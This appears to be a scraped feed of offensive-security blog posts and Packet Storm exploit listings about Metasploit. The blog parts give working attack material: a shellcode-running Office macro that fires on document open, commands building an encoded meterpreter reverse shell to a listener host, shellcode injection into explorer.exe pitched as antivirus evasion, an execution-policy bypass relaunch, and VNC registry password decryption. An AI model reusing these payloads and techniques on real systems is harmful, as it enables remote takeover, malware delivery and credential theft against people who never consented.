http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspxYou will need to set the execution policy for v1.0 powershell, or possibly try a
bypass technique.
I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.
[Byte[]]$sc = $sc32
if ($env:Processor_Architecture -ne "x86")
{
write-warning "WTF! This is 64x, switching to 32x and continuing script."
&"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass
exit
}now it works
Remember that you have to migrate out of the PowerShell process.
Much like the office macro and shellcode exec, if user closes office, or you close exit powershell process shell goes bye-bye.
References:
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.htmlhttp://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.htmlhttp://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.htmlhttp://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.htmlhttp://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
-
-
5:00
»
Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH
Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
LOW?
IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....
The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*
I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.
Once you have a directory you want to test you can use
cadaver to manually test,
davtest, or
Ryan Linn's metasploit module for testing for WebDAV.
I've also done some posts on webDAV in the past
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.htmlhttp://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.htmlhdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.htmlDecent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdfHTTP PUTHTTP PUT/SEARCH usually gets rolled into
Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.
Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.
metasploit has a module to test for PUT functionality as well.
http://www.metasploit.com/modules/auxiliary/scanner/http/http_putHTTP SEARCHHTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.
Mubix did a post on it
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
-
-
13:36
»
Packet Storm Security Exploits
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
13:36
»
Packet Storm Security Recent Files
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
13:36
»
Packet Storm Security Misc. Files
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
22:45
»
Packet Storm Security Misc. Files
Whitepaper called Metasploit: Low Level View. It touches on topics such as code injection and malware detection evasion / Metasploit encoders.
-
-
14:21
»
Carnal0wnage
scriptjunkie recently had a post on
Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.
-
-
17:08
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
17:08
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
17:08
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
-
7:41
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
-
7:41
»
Packet Storm Security Misc. Files
This Metasploit module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
-
-
7:50
»
Packet Storm Security Exploits
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
7:50
»
Packet Storm Security Recent Files
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
7:50
»
Packet Storm Security Misc. Files
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
-
22:26
»
Packet Storm Security Exploits
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
22:26
»
Packet Storm Security Recent Files
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
22:26
»
Packet Storm Security Misc. Files
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
-
7:36
»
Packet Storm Security Recent Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
-
7:36
»
Packet Storm Security Misc. Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
-
0:24
»
SecDocs
Authors:
Max Moser Philipp Schrödel Tags:
web application web Metasploit Event:
Hashdays 2010 Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploits Meterpreter technology to communicate in between the client (to be scanned target) and the server (The Metasploit Server running the CARAT plugin), execute commands and consolidate the results. By introducing client specific job scheduling to Metasploit, CARAT is a Framework for automated configuration validation, security assessments and functional testing of components and applications. In contrary to a lot of other available frameworks, CARATs architecture is as simple as possible, this allows a great amount of flexibility to its users.
-
-
18:07
»
Packet Storm Security Exploits
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
18:07
»
Packet Storm Security Recent Files
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
18:07
»
Packet Storm Security Misc. Files
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
-
13:14
»
Packet Storm Security Exploits
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
13:14
»
Packet Storm Security Recent Files
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
13:14
»
Packet Storm Security Misc. Files
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
-
18:20
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
18:20
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
18:20
»
Packet Storm Security Misc. Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
6:40
»
Packet Storm Security Recent Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
-
6:40
»
Packet Storm Security Misc. Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
-
-
8:27
»
Packet Storm Security Recent Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
-
8:27
»
Packet Storm Security Misc. Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
-
-
17:47
»
Packet Storm Security Recent Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
-
17:47
»
Packet Storm Security Misc. Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
-
-
4:12
»
Carnal0wnage
You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.
There are two public options I have found; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexechttp://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload:
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt
Once you have shell you need to migrate out of it, it will be in the shellcodeexec process and as soon as someone ctrl-c or kills that cmd.exe the process dies and so does your shell
Looks like this:
Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspxhttp://www.securestate.com/Documents/syringe.c = Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile “C:\codelocation\cl syringe.c”
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell
-2 is preferred, located explorer.exe inject shellcode into that
C:\Documents and Settings\User\Desktop>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 424 K
csrss.exe 604 Console 0 3,852 K
winlogon.exe 628 Console 0 5,012 K
services.exe 680 Console 0 3,440 K
lsass.exe 692 Console 0 1,408 K
vmacthlp.exe 848 Console 0 2,756 K
svchost.exe 864 Console 0 4,924 K
svchost.exe 944 Console 0 4,308 K
MsMpEng.exe 1040 Console 0 53,812 K
svchost.exe 1076 Console 0 23,780 K
svchost.exe 1164 Console 0 3,616 K
svchost.exe 1368 Console 0 3,916 K
explorer.exe 1624 Console 0 15,256 K
spoolsv.exe 1656 Console 0 6,072 K
VMwareTray.exe 1848 Console 0 5,044 K
VMwareUser.exe 1856 Console 0 6,328 K
msseces.exe 1864 Console 0 10,708 K
jusched.exe 1920 Console 0 4,304 K
msmsgs.exe 1928 Console 0 2,488 K
ctfmon.exe 1952 Console 0 3,248 K
svchost.exe 740 Console 0 3,760 K
jqs.exe 1108 Console 0 1,396 K
vmtoolsd.exe 1264 Console 0 9,976 K
VMUpgradeHelper.exe 1212 Console 0 4,176 K
TPAutoConnSvc.exe 2396 Console 0 4,392 K
alg.exe 2680 Console 0 3,612 K
TPAutoConnect.exe 3060 Console 0 4,848 K
iexplore.exe 3784 Console 0 16,300 K
iexplore.exe 4064 Console 0 45,392 K
wuauclt.exe 1224 Console 0 4,276 K
java.exe 1112 Console 0 27,516 K
java.exe 2520 Console 0 14,272 K
notepad.exe 440 Console 0 3,572 K
jucheck.exe 3112 Console 0 6,120 K
cmd.exe 3260 Console 0 2,700 K
tasklist.exe 3332 Console 0 4,580 K
wmiprvse.exe 3368 Console 0 5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624
Looks like this (you can use the same shellcode in syringe):
-
-
0:52
»
Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
0:52
»
Packet Storm Security Misc. Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
-
19:24
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
19:24
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
-
21:52
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
21:52
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
21:52
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
-
13:36
»
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
13:36
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
13:36
»
Packet Storm Security Misc. Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
19:32
»
Carnal0wnage
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
-
-
9:59
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
9:59
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
9:59
»
Packet Storm Security Misc. Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
13:25
»
SecDocs
Authors:
Max Moser Philipp Schrödel Tags:
web application web Metasploit Event:
Hashdays 2010 Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploits Meterpreter technology to communicate in between the client (to be scanned target) and the server (The Metasploit Server running the CARAT plugin), execute commands and consolidate the results. By introducing client specific job scheduling to Metasploit, CARAT is a Framework for automated configuration validation, security assessments and functional testing of components and applications. In contrary to a lot of other available frameworks, CARATs architecture is as simple as possible, this allows a great amount of flexibility to its users.
-
-
12:24
»
Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's
VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.
Its tedious to password guess like this
Instead let's use the metasploit module
and throw a dictionary attack against the VNC server
Looks like the VNC no auth module had been ported and stuck in there too :-)
-CG
-
-
9:11
»
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
9:11
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
9:11
»
Packet Storm Security Misc. Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
17:44
»
Packet Storm Security Exploits
The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
17:44
»
Packet Storm Security Recent Files
The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
17:44
»
Packet Storm Security Misc. Files
